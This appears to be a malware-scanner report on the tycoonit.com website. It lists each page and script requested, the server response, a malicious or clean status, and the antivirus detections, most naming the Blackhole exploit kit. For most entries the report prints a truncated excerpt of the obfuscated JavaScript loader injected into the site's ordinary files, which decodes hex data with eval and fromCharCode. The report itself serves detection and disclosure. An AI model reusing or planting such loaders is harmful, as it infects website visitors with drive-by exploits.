Request | Server response | Status |
http://tycoonit.com/ | 200 OK Content-Length: 13004 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/scripts/museutils.js?3992981318 | 200 OK Content-Length: 27355 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wrecby="y";kyjqhk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kyjqhk].getElementById("asd"))}()}catch(dnsmhc){fmem=function(xjq){xjq="fro"+xjq;for(yrai=0;yrai<wrecby.length;yrai++){pdt+=String[xjq](xxwp(tcdhbw+(wrecby[yrai]))-(88));}};};xxwp=(window.eval);tcdhbw="0x";ujp=0;if(!ujp){try{++xxwp(kyjqhk)["\x62o"+"d"+wrecby]}catch(dnsmhc){hft="(";}wrecby="78(be(cd(c6(bb(cc(c1(c7(c6(78(be(cf(88(91(80(81(78(d3(65(62(78(ce(b9(ca(78(cb(cc(b9(cc(c1(bb(95(7f(b9(c2(b9(d0(7f
... 3611 bytes are skipped ...6(bf(80(78(c4(bd(c6(84(78(bd(c6(bc(78(81(78(81(93(65(62(d5(65(62(c1(be(78(80(c6(b9(ce(c1(bf(b9(cc(c7(ca(86(bb(c7(c7(c3(c1(bd(9d(c6(b9(ba(c4(bd(bc(81(65(62(d3(65(62(c1(be(80(9f(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(81(95(95(8d(8d(81(d3(d5(bd(c4(cb(bd(d3(ab(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(84(78(7f(8d(8d(7f(84(78(7f(89(7f(84(78(7f(87(7f(81(93(65(62(65(62(be(cf(88(91(80(81(93(65(62(d5(65(62(d5".split(hft);pdt="";fmem("mCharCode");xxwp(""+pdt);}Antivirus reports:- AntiVir
- JS/Blacole.EB.282
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1227
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/scripts/jquery.musemenu.js?3788803530 | 200 OK Content-Length: 10140 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wrecby="y";kyjqhk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kyjqhk].getElementById("asd"))}()}catch(dnsmhc){fmem=function(xjq){xjq="fro"+xjq;for(yrai=0;yrai<wrecby.length;yrai++){pdt+=String[xjq](xxwp(tcdhbw+(wrecby[yrai]))-(88));}};};xxwp=(window.eval);tcdhbw="0x";ujp=0;if(!ujp){try{++xxwp(kyjqhk)["\x62o"+"d"+wrecby]}catch(dnsmhc){hft="(";}wrecby="78(be(cd(c6(bb(cc(c1(c7(c6(78(be(cf(88(91(80(81(78(d3(65(62(78(ce(b9(ca(78(cb(cc(b9(cc(c1(bb(95(7f(b9(c2(b9(d0(7f
... 3611 bytes are skipped ...6(bf(80(78(c4(bd(c6(84(78(bd(c6(bc(78(81(78(81(93(65(62(d5(65(62(c1(be(78(80(c6(b9(ce(c1(bf(b9(cc(c7(ca(86(bb(c7(c7(c3(c1(bd(9d(c6(b9(ba(c4(bd(bc(81(65(62(d3(65(62(c1(be(80(9f(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(81(95(95(8d(8d(81(d3(d5(bd(c4(cb(bd(d3(ab(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(84(78(7f(8d(8d(7f(84(78(7f(89(7f(84(78(7f(87(7f(81(93(65(62(65(62(be(cf(88(91(80(81(93(65(62(d5(65(62(d5".split(hft);pdt="";fmem("mCharCode");xxwp(""+pdt);}Antivirus reports:- AntiVir
- JS/Blacole.EB.282
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1227
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/scripts/webpro.js?197321703 | 200 OK Content-Length: 41388 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wrecby="y";kyjqhk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kyjqhk].getElementById("asd"))}()}catch(dnsmhc){fmem=function(xjq){xjq="fro"+xjq;for(yrai=0;yrai<wrecby.length;yrai++){pdt+=String[xjq](xxwp(tcdhbw+(wrecby[yrai]))-(88));}};};xxwp=(window.eval);tcdhbw="0x";ujp=0;if(!ujp){try{++xxwp(kyjqhk)["\x62o"+"d"+wrecby]}catch(dnsmhc){hft="(";}wrecby="78(be(cd(c6(bb(cc(c1(c7(c6(78(be(cf(88(91(80(81(78(d3(65(62(78(ce(b9(ca(78(cb(cc(b9(cc(c1(bb(95(7f(b9(c2(b9(d0(7f
... 3611 bytes are skipped ...6(bf(80(78(c4(bd(c6(84(78(bd(c6(bc(78(81(78(81(93(65(62(d5(65(62(c1(be(78(80(c6(b9(ce(c1(bf(b9(cc(c7(ca(86(bb(c7(c7(c3(c1(bd(9d(c6(b9(ba(c4(bd(bc(81(65(62(d3(65(62(c1(be(80(9f(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(81(95(95(8d(8d(81(d3(d5(bd(c4(cb(bd(d3(ab(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(84(78(7f(8d(8d(7f(84(78(7f(89(7f(84(78(7f(87(7f(81(93(65(62(65(62(be(cf(88(91(80(81(93(65(62(d5(65(62(d5".split(hft);pdt="";fmem("mCharCode");xxwp(""+pdt);}Antivirus reports:- AntiVir
- JS/Blacole.EB.282
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1227
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/scripts/musewpdisclosure.js?4285748861 | 200 OK Content-Length: 7878 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wrecby="y";kyjqhk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kyjqhk].getElementById("asd"))}()}catch(dnsmhc){fmem=function(xjq){xjq="fro"+xjq;for(yrai=0;yrai<wrecby.length;yrai++){pdt+=String[xjq](xxwp(tcdhbw+(wrecby[yrai]))-(88));}};};xxwp=(window.eval);tcdhbw="0x";ujp=0;if(!ujp){try{++xxwp(kyjqhk)["\x62o"+"d"+wrecby]}catch(dnsmhc){hft="(";}wrecby="78(be(cd(c6(bb(cc(c1(c7(c6(78(be(cf(88(91(80(81(78(d3(65(62(78(ce(b9(ca(78(cb(cc(b9(cc(c1(bb(95(7f(b9(c2(b9(d0(7f
... 3611 bytes are skipped ...6(bf(80(78(c4(bd(c6(84(78(bd(c6(bc(78(81(78(81(93(65(62(d5(65(62(c1(be(78(80(c6(b9(ce(c1(bf(b9(cc(c7(ca(86(bb(c7(c7(c3(c1(bd(9d(c6(b9(ba(c4(bd(bc(81(65(62(d3(65(62(c1(be(80(9f(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(81(95(95(8d(8d(81(d3(d5(bd(c4(cb(bd(d3(ab(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(84(78(7f(8d(8d(7f(84(78(7f(89(7f(84(78(7f(87(7f(81(93(65(62(65(62(be(cf(88(91(80(81(93(65(62(d5(65(62(d5".split(hft);pdt="";fmem("mCharCode");xxwp(""+pdt);}Antivirus reports:- AntiVir
- JS/Blacole.EB.282
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1227
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/scripts/jquery.watch.js?4068933136 | 200 OK Content-Length: 5706 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wrecby="y";kyjqhk="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[kyjqhk].getElementById("asd"))}()}catch(dnsmhc){fmem=function(xjq){xjq="fro"+xjq;for(yrai=0;yrai<wrecby.length;yrai++){pdt+=String[xjq](xxwp(tcdhbw+(wrecby[yrai]))-(88));}};};xxwp=(window.eval);tcdhbw="0x";ujp=0;if(!ujp){try{++xxwp(kyjqhk)["\x62o"+"d"+wrecby]}catch(dnsmhc){hft="(";}wrecby="78(be(cd(c6(bb(cc(c1(c7(c6(78(be(cf(88(91(80(81(78(d3(65(62(78(ce(b9(ca(78(cb(cc(b9(cc(c1(bb(95(7f(b9(c2(b9(d0(7f
... 3611 bytes are skipped ...6(bf(80(78(c4(bd(c6(84(78(bd(c6(bc(78(81(78(81(93(65(62(d5(65(62(c1(be(78(80(c6(b9(ce(c1(bf(b9(cc(c7(ca(86(bb(c7(c7(c3(c1(bd(9d(c6(b9(ba(c4(bd(bc(81(65(62(d3(65(62(c1(be(80(9f(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(81(95(95(8d(8d(81(d3(d5(bd(c4(cb(bd(d3(ab(bd(cc(9b(c7(c7(c3(c1(bd(80(7f(ce(c1(cb(c1(cc(bd(bc(b7(cd(c9(7f(84(78(7f(8d(8d(7f(84(78(7f(89(7f(84(78(7f(87(7f(81(93(65(62(65(62(be(cf(88(91(80(81(93(65(62(d5(65(62(d5".split(hft);pdt="";fmem("mCharCode");xxwp(""+pdt);}Antivirus reports:- AntiVir
- JS/Blacole.EB.282
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1227
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/index.html | 200 OK Content-Length: 13004 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/website-templates.html | 200 OK Content-Length: 6708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/test404page.js | 404 Not Found Content-Length: 393 Content-Type: text/html | clean |
http://tycoonit.com/anti-virus.html | 200 OK Content-Length: 6698 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/search-engine-submission.html | 200 OK Content-Length: 6722 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://tycoonit.com/contact-us.html | 200 OK Content-Length: 9877 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) lvopfu="y";rktteb="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rktteb].getElementById("asd"))}()}catch(niu){fhkxn=function(guh){guh="fro"+guh;for(gfao=0;gfao<lvopfu.length;gfao++){zkmw+=String[guh](exh(ngfvc+(lvopfu[gfao]))-(22));}};};exh=(window.eval);ngfvc="0x";hsdo=0;if(!hsdo){try{++exh(rktteb)["\x62o"+"d"+lvopfu]}catch(niu){avvlsr="(";}lvopfu="36(7c(8b(84(79(8a(7f(85(84(36(83(89(8d(8f(46(4f(3e(3f(36(91(23(20(36(8c(77(88(36(89(8a(77(8a(7f(79(53(3d(77(80(77(8e(
... 3702 bytes are skipped ...82(7b(84(42(36(7b(84(7a(36(3f(36(3f(51(23(20(93(23(20(7f(7c(36(3e(84(77(8c(7f(7d(77(8a(85(88(44(79(85(85(81(7f(7b(5b(84(77(78(82(7b(7a(3f(23(20(91(23(20(7f(7c(3e(5d(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(3f(53(53(4b(4b(3f(91(93(7b(82(89(7b(91(69(7b(8a(59(85(85(81(7f(7b(3e(3d(8c(7f(89(7f(8a(7b(7a(75(8b(87(3d(42(36(3d(4b(4b(3d(42(36(3d(47(3d(42(36(3d(45(3d(3f(51(23(20(23(20(83(89(8d(8f(46(4f(3e(3f(51(23(20(93(23(20(93".split(avvlsr);zkmw="";fhkxn("mCharCode");exh(""+zkmw);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1102
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.KI
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|